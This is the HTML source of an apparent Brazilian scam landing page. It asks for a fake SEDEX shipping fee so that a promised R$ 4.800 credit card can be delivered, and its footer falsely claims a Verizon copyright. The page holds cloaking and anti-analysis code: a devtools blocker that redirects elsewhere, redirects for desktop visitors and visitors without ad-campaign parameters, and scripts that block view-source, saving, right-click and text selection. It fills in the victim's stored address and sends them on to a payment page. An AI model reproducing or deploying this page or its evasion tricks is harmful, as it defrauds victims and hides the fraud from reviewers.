<!DOCTYPE html><html lang="pt-BR"><head>

  <script disable-devtool-auto="" src="https://cdn.jsdelivr.net/npm/disable-devtool"
    url="https://appavaliadorpremios.shop/lp/"></script>

<script type="text/javascript">
    if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
        window.location.href = 'https://appavaliadorpremios.shop/lp/';
    }
</script>
  <script type="text/javascript">
    (function () {
        /**
         * Função para verificar a presença de múltiplos parâmetros na URL
         * @param {Array} names - Array contendo os nomes dos parâmetros a serem verificados
         * @returns {boolean} - Retorna true se todos os parâmetros estiverem presentes, caso contrário, false
         */
        function hasAllURLParameters(names) {
            const urlParams = new URLSearchParams(window.location.search);
            return names.every(param => urlParams.has(param));
        }

        // Array contendo os parâmetros obrigatórios
        const requiredParams = ['CampaignID', 'adSETID', 'CreativeID', 'pixel_id'];

        // URL para redirecionamento caso algum dos parâmetros não esteja presente
        const redirectURL = 'https://appavaliadorpremios.shop/lp/';

        /**
         * Função principal que verifica os parâmetros da URL
         * e redireciona o usuário se necessário
         */
        function checkURLParameters() {
            if (!hasAllURLParameters(requiredParams)) {
                window.location.href = redirectURL;
            }
        }

        // Executa a verificação imediatamente assim que o script é carregado
        checkURLParameters();
    })();
</script>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width,initial-scale=1">

    <script type="text/javascript" async="" src="js/core.a138acf9d894ee48.js"></script>
    <script type="text/javascript" async="" src="js/core%281%29.a138acf9d894ee48.js"></script>
    <script type="text/javascript" async="" src="js/identify_45dd5971.js"></script>

    <script type="text/javascript" async="" src="js/main.MTg5YzZmMDFkMQ.js" data-id="CR88BSBC77U42T4DV7H0"></script>


    <style>
      .header {
        background: linear-gradient(147deg, #ffe53b 0%, #ff2525 74%);
        color: white;
        padding: 15px 0;
        text-align: center;
        font-size: 1.5rem;
        font-weight: bold;
        grid-area: top-bar;
      }
      .main-content {
        max-width: 450px;
        background-color: white;
        text-align: center;
        padding: 2rem 2rem 1rem 2rem;
        border-radius: 10px;
        box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
        margin: 0 auto;
      }
      .main-content h2 {
        margin-bottom: 20px;
      }
      .btn-custom {
        color: rgb(0, 0, 0);
        border: none;
        width: 100%;
        margin-bottom: 10px;
        background: #ff2525;
        font-weight: 600;
        border-radius: 1rem;
        padding: 0.75rem 3rem;
        letter-spacing: 0.3px;
        line-height: 1.15;
      }
      .btn-custom:hover {
        color: white !important;
        background-color: #ff2525;
        transform: scale(1.02) !important;
      }

      .footer {
        background: #ffffff;
        border-top: 1px solid #e6e6e6;
        text-align: center;
        padding: 15px;
        font-size: 10px;
        color: #666;
      }

      .spinner-container {
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        height: 100px;
      }

      .details-block {
        text-align: left;
        border: 1px solid #ddd;
        padding: 15px;
        border-radius: 8px;
        margin-top: 20px;
      }

      .details-block h4 {
        margin-bottom: 15px;
        font-size: 1.2rem;
        font-weight: bold;
      }

      .details-block div {
        margin-bottom: 15px;
        border-bottom: 1px solid #ddd;
        padding-bottom: 10px;
      }

      .details-block div:last-child {
        border-bottom: none;
        margin-bottom: 0;
      }

      .card-highlight {
        background-color: #e6f7e6;
        border: 1px solid #c3e6cb;
        border-radius: 8px;
        padding: 15px;
        margin-top: 20px;
        text-align: left;
      }

      .card-highlight h4 {
        font-size: 1.2rem;
        font-weight: bold;
        margin-bottom: 10px;
        color: #155724;
      }

      .card-highlight p {
        font-size: 0.95rem;
        color: #155724;
      }

      .success-block {
        border: 1px solid #ddd;
        border-radius: 8px;
        padding: 15px;
        margin-top: 20px;
        text-align: left;
      }

      .success-block h4 {
        font-size: 1.2rem;
        font-weight: bold;
        margin-bottom: 10px;
        color: green;
        display: flex;
        align-items: center;
        gap: 10px;
      }
    </style>

    <script>
      if (document.addEventListener) {
        document.addEventListener("keydown", bloquearSource);
      } else {
        //Versões antigas do IE
        document.attachEvent("onkeydown", bloquearSource);
      }

      function bloquearSource(e) {
        e = e || window.event;

        var code = e.which || e.keyCode;

        if (
          e.ctrlKey &&
          (code == 83 || code == 85) //83 = S, 85 = U
        ) {
          if (e.preventDefault) {
            e.preventDefault();
          } else {
            e.returnValue = false;
          }

          return false;
        }
      }
    </script>

    <style>
      /*desabilita a seleção no body*/
      body {
        -webkit-touch-callout: none; /* iOS Safari */
        -webkit-user-select: none; /* Chrome/Safari/Opera */
        -khtml-user-select: none; /* Konqueror */
        -moz-user-select: none; /* Firefox */
        -ms-user-select: none; /* Internet Explorer/Edge */
        user-select: none;
      }

      /*habilita a seleção nos campos editaveis*/
      input,
      textarea {
        -webkit-touch-callout: initial; /* iOS Safari */
        -webkit-user-select: text; /* Chrome/Safari/Opera */
        -khtml-user-select: text; /* Konqueror */
        -moz-user-select: text; /* Firefox */
        -ms-user-select: text; /* Internet Explorer/Edge */
        user-select: text;
      }

      /*habilita a seleção nos campos com o atributo contenteditable*/
      [contenteditable="true"] {
        -webkit-touch-callout: initial; /* iOS Safari */
        -webkit-user-select: all; /* Chrome/Safari/Opera */
        -khtml-user-select: all; /* Konqueror */
        -moz-user-select: all; /* Firefox */
        -ms-user-select: all; /* Internet Explorer/Edge */
        user-select: all;
      }
    </style>

    <script>
      if (document.addEventListener) {
        document.addEventListener("contextmenu", function (e) {
          e.preventDefault();
          return false;
        });
      } else {
        //Versões antigas do IE
        document.attachEvent("oncontextmenu", function (e) {
          e = e || window.event;
          e.returnValue = false;
          return false;
        });
      }
    </script>

    <script type="text/javascript" async="" src="f.txt"></script>

    <!-- Google tag (gtag.js) -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=G-NGSPZL3X93"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-NGSPZL3X93');
</script>


  </head>

  <body>
   
    <div style="
        display: grid;
        grid-template-areas:
          'top-bar'
          'content'
          'footer';
        grid-template-rows: auto 1fr auto;
        min-height: 100vh;
      ">
      <div class="header">
        <img decoding="async" style="width: 120px" src="images/logo.png" alt="Imagem Centralizada">
      </div>

      <div style="grid-area: content; padding: 0 1rem">
        <div class="main-content">
          <!-- Primeira etapa de geração da taxa -->
          <div id="etapa1" class="spinner-container d-none">
            <p>Gerando a Taxa de Correios - SEDEX...</p>
            <div class="spinner-border" role="status">
              <span class="visually-hidden">Carregando...</span>
            </div>
          </div>

          <!-- Segunda etapa - Taxa de envio gerada -->
          <div id="etapa2" class="success-block">
            <h4>
              <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="green" class="bi bi-check-circle-fill" viewBox="0 0 16 16">
                <path d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0zM6.354 10.354l4-4a.5.5 0 1 0-.708-.708L6 9.293 4.354 7.646a.5.5 0 1 0-.708.708l2 2a.5.5 0 0 0 .708 0z"></path>
              </svg>
              Taxa de envio gerada com sucesso!
            </h4>
          </div>

          <div class="details-block" id="etapa-detalhes">
            <h4>Detalhes do Envio</h4>
            <div>
              <strong>Endereço de entrega:</strong>
              <p id="enderecoCliente">
                        213132, 2131<br>
                        dsaas<br>
                        dasda-AC<br>
                        CEP: 22312-32
                    </p>
            </div>
            <div>
              <strong>Método de envio:</strong>
              <p>
                <strong>SEDEX<br>
                  R$ 34,90</strong><br>
                1 dia útil<br>
                Taxa única de envio • Rastreamento online
              </p>
            </div>
            <div>
              <strong>Início do envio:</strong>
              <p>Hoje iniciaremos o procedimento de envio em até 2 horas</p>
            </div>
          </div>

          <!-- Cartão Virtual Disponível Hoje -->
          <div id="etapa3" class="card-highlight">
            <h4>
              <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-credit-card" viewBox="0 0 16 16">
                <path d="M0 4a2 2 0 0 1 2-2h12a2 2 0 0 1 2 2H0zm0 3h16v5a2 2 0 0 1-2 2H2a2 2 0 0 1-2-2V7zm3.5 2a.5.5 0 0 0 0 1h2a.5.5 0 0 0 0-1h-2z"></path>
              </svg>
              Cartão Virtual Disponível Hoje
            </h4>
            <p>
              Você receberá hoje seu cartão virtual com limite de R$ 4.800 para
              começar a usar imediatamente, enquanto seu cartão físico está a
              caminho.
            </p>
          </div>

          <!-- Botão Final -->
          <button type="button" id="confirmar" onclick="location.href='pagar-sedex.html' + window.location.search" class="btn btn-custom w-100 rounded-pill mt-4">
            SIM, VOU QUERER!
          </button>
        </div>
      </div>

      <!-- Footer -->
      <div class="footer">
        Copyright © 2025 Verizon. Todos os direitos reservados.<br>

        Política de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa
        do Site
      </div>

      <script>
        function mostrarEtapas() {
          // Simula a geração da taxa
          setTimeout(() => {
            document.getElementById("etapa1").classList.add("d-none");
            document.getElementById("etapa2").classList.remove("d-none");
          }, 3000);

          // Simula a exibição dos detalhes e do botão
          setTimeout(() => {
            document
              .getElementById("etapa-detalhes")
              .classList.remove("d-none");
            document.getElementById("etapa3").classList.remove("d-none");
            document.getElementById("confirmar").classList.remove("d-none");

            // Obtém o endereço armazenado no localStorage
            const endereco = JSON.parse(
              localStorage.getItem("enderecoCliente")
            );
            if (endereco) {
              document.getElementById("enderecoCliente").innerHTML = `
                        ${endereco.rua}, ${endereco.numero}<br>
                        ${endereco.bairro}<br>
                        ${endereco.cidade}-${endereco.estado}<br>
                        CEP: ${endereco.cep}
                    `;
            } else {
              document.getElementById("enderecoCliente").innerText =
                "Endereço não encontrado.";
            }
          }, 6000);
        }

        // Executa a função ao carregar a página
        window.onload = mostrarEtapas;
      </script>
    </div>

<script>
      window.pixelId = "66b3a64f335ef199b3e5b257";
      var a = document.createElement("script");
      a.setAttribute("async", "");
      a.setAttribute("defer", "");
      a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
      document.head.appendChild(a);
    </script>
    
    <script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>



</body></html>